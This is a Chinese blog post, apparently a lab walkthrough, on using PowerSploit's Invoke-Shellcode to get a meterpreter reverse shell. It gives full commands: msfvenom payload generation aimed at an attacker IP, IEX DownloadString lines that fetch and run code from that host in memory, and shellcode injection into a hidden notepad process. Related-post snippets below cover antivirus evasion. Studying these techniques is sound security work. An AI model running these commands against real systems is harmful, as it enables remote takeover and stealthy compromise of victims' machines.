PowerSploit 之 Invoke-ShellCode

最新推荐文章于 2022-05-25 17:44:55 发布
最新推荐文章于 2022-05-25 17:44:55 发布
阅读量1.5k 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/121191953
版权

 Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码

反向连接的shellcode:
当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。

Invoke-ShellCode脚本:常用于将 ShellCode 插入指定的进程 ID 或本地 powershell 中

1.直接执行ShellCode反弹 meterpreter shell

(1)使用 msfvenom 命令生成一个powershell 脚本木马,kali(ip):192.168.110.130

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.130 LPORT=4444 -f powershell -o /var/www/html/test

(2)在 msf 中使用 reverse_https 模块进行反弹

(3)在目标机 powershell 输入命令下载脚本。IEX加载到内存,并没有把该脚本下载到本地

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/test")

(4)运行木马,Force:不用提示,直接执行

Invoke-Shellcode -Shellcode($buf) -Force

win7执行后不知道为什么会出现 windows powershell 停止工作,meterpreter反弹不成功

2.指定进程注入 ShellCode 反弹 meterpreter shell

(1)查看当前进程

Get-Process    或者   ps

(2)创建一个新进程,启动记事本,并把它设置为隐藏

Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden

如果没隐藏窗口,记事本弹出来

  

结果会多了一个 id为 2484 ,名为 notepad 的进程

(3)输入命令,使用 Invoke-Shellcode 脚本进程注入

Invoke-Shellcode -ProcessID 2484 -Shellcode($buf) -Force

 记事本直接停止工作,无法反弹 meterpreter shell(本来应该成功的)

橙汁水
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Powershell免杀(远程加载shellcode)笔记
jackslowf的博客
06-24 2121
原文链接 远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。 下面代码直接从uri读取字节数组(对的,没仔细看) # remoteshell.ps1 Set-StrictMode -Version 2 function get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_paramete
网络安全-powershellpowersploit Invoke-shellcode
u013930899的博客
05-06 1849
一、直接执行ShellCode反弹Meterpreter Shell 1. 设置msf Msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https (一定要选择对应的位数,x64) set LHOST 192.168.101.46 set LPORT 4444 Run 2. 生成powershell脚本木马 msfvenom -p windows/x6.
c++调用powershell_从ShellCode启动PowerShell后门
weixin_39592137的博客
10-21 652
当您需要在受害者的计算机上执行恶意操作时,Internet上充满了可以重复使用,分叉或稍作更改以满足您要求的资源。毕竟,如果一些代码可以在GitHub上免费获得,为什么还要重新发明轮子呢?如果您有充分的理由开发了一些攻击性工具(因为您是一个彭特,是一个只从事研究工作的红色团队),那么很可能会重用您的代码。这是一个在野外发现的实际例子。初始PowerShell脚本的VT分数为8/59(SH...
powershell渗透基础
qq_46804551的博客
04-30 1248
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
PowerSploit脚本攻击实战
bring_coco的博客
01-24 974
环境 kali(192.168.188.128) win7(192.168.188.148) 前提 1.输入git命令安装PowerSploit 命令:git clone https://github.com/PowerShellMafia/PowerSploit 演示: 2.输入以下命令开启Apache服务 命令:service apache2 start 演示: 3.把下载好的文件夹移动到var/www/html目录,搭建一个简易的服务器 介绍PowerSploit各模块的功能 1.Antivi
PowerSploitPowerSploit-PowerShell开发后框架
02-18
Invoke-Shellcodeshellcode注入您选择的进程ID或在本地PowerShell中。Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。脚本修改修改和/或准备脚本以在受感染的...
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
Invoke-AltDSBackdoor
05-04
示例:PS C:\ Users \ test \ Desktop> Invoke-ADSBackdoor -URL “ Invoke-Shellcode -Lhost 192.168.1.138 -LPort 2222 -Payload windows / meterpreter / reverse_https -Force“这将使用Invoke-Shellcode.ps1...
Invoke-ARPScan.ps1
04-04
Invoke-ARPScan.ps1
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
无文件渗透实验
一个码农的笔记
03-09 4315
无文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
无弹窗渗透实验
一个码农的笔记
09-02 5003
首先是内网的拓扑 拓扑说明: 【1】10.101.101.0/24的网段模拟的是外网的地址 【2】192.168.101.0/24的网段模拟的是一个小型企业的内网中的应用服务器网络 【3】192.168.111.0/24的网段模拟的是一个小型企业的内网中的办公网络 【4】企业内网可以无限制的访问到外网,但是外网无法访问到企业内网 【5】办公网可以无限制的访问到应用服务器网络,但是应用
第一章 内网渗透测试基础
江南小虫虫的博客
02-13 8312
0x00 内网基础知识 内网也指局域网(Local Area Network, LAN), 是指在某一区域内由多台计算机互连而成的计算机组 在局域网中, 可以实现文件管理, 应用软件共享, 打印机共享, 工作组内的日程安排, 电子邮件和传真通信服务器等 工作组 将不同的计算机按功能(或部门)分别列入不同的工作组(Work Group) 加入/创建工作组的方法: 右键桌面计算机->属性-&g...
Powershell攻击指南2——Empire
willow_liang的博客
12-05 974
目录 Empire 1.介绍 2.安装 3.使用监听 4.生成木马 4.1 DLL木马 4.2 launcher 4.3 launcher_vbs木马 4.4 launcher_bat木马 4.5 Macro木马 4.6Ducky 连接主机及基本使用 1.查看已经连接的主机 2.interact命令连接主机 信息收集 Empire 1.介绍 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成.
如何用Powershell PE注入弹你一脸计算器
xiaoi123的博客
05-10 1575
i春秋超级版主:浅安今天我们将看看以编程的方式把shellcode注入到磁盘上的PE可执行文件中,请注意我们仅仅只是在谈论exe文件,PE文件格式包括许多其他扩展(dll,ocx,sys,cpl,fon,…)。手动执行此操作非常简单,关键点在于需要确保PE的功能没有改变,以免引起怀疑。但手动注入往往不实用,你需要先复制一份PE,在你自己主机上更改它,然后替换目标机器中的该文件。为了简化这个过程,我...
记一次PowerShell免杀实战
zhangge3663的博客
12-30 1640
最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家。 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序(例如: sh、bash或csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。 powershell具有在硬盘中易绕过,内存中难查杀的特点。一般在后渗透
远控免杀从入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1055
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
Powershell脚本加密以及持久化运行 + BMP隐藏Shellcode
weixin_30556959的博客
02-15 944
工欲善其事必先利其器本文所需工具:DKMC,PWSH,Invoke-Obfuscation,empire1.DKMC(生成图片木马后门)下载地址:https://github.com/Mr-Un1k0d3r/DKMC参考链接:https://blog.csdn.net/cloudatlasm/article/details/79039391 http://www.secist.com/archi...
Shellcode混淆研究
SHELLCODE_8BIT的博客
05-25 220
X86 Shellcode Obfuscation - Part 1
invoke-custom 指令是什么
最新发布
06-12
invoke-custom 是 Java 虚拟机中一种比较特殊的指令,它是用于实现动态语言和函数式编程语言的重要机制之一。 在 Java 8 之前,Java 语言并没有对函数式编程提供原生的支持。但是,Java 8 引入了 Lambda 表达式和方法引用等语言特性,从而使得 Java 语言也具备了一定程度的函数式编程能力。而为了支持这些新特性,Java 8 还引入了一个新的指令 invokeDynamic,它可以在运行时动态地绑定方法实现。而 invoke-custom 指令则是 invokeDynamic 的一种特殊形式,它用于将一个方法调用绑定到一个特定的方法实现上。 具体来说,当虚拟机遇到 invoke-custom 指令时,它会根据指令中的参数动态地绑定一个方法实现,并将该方法实现作为一个函数对象返回。然后,程序可以像调用普通的方法一样调用这个函数对象,从而实现动态语言和函数式编程语言中的一些高级特性,比如闭包、柯里化和惰性求值等。 需要注意的是,由于 invoke-custom 指令比较复杂,它只能在支持 Java 7 及以上版本的虚拟机中使用。而在 Android 平台上,只有在 API 级别 26 及以上的版本中才支持 invoke-custom 指令。这也就是为什么在低于 Android O 的版本上使用 invoke-custom 指令会导致错误的原因。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值